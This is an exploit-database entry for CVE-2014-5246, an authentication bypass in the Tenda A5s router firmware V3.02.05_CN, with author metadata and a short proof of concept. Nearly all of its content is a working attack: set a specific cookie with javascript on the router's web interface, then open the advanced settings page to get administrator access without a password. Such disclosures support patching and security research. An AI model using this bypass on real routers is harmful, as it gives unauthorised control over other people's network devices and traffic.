Tenda A5s Router 3.02.05_CN - Authentication Bypass
Author: zixian
type: webapps
platform: hardware
port: 80.0
date_added: 2014-08-18
date_updated: 2014-08-18
verified: 0
codes: CVE-2014-5246;OSVDB-110146
tags:
aliases:
screenshot_url:
application_url:
-----------------------------------------------------------------------
Tenda A5s Router Authentication Bypass Vulnerability
-----------------------------------------------------------------------
Author : zixian
Mail : me@zixian.org
Date : Aug, 17-2014
Vendor : http://tenda.com.cn/
Link : http://tenda.com.cn/Catalog/Product/223
Version : V3.02.05_CN
CVE : CVE-2014-5246
Exploit & p0c
_____________
go to
http://192.168.2.1/
then set cookie with javascript
javascript:document.cookie='admin:language=zh-cn'
go to
http://192.168.2.1/advance.asp
you are the admin!
_____________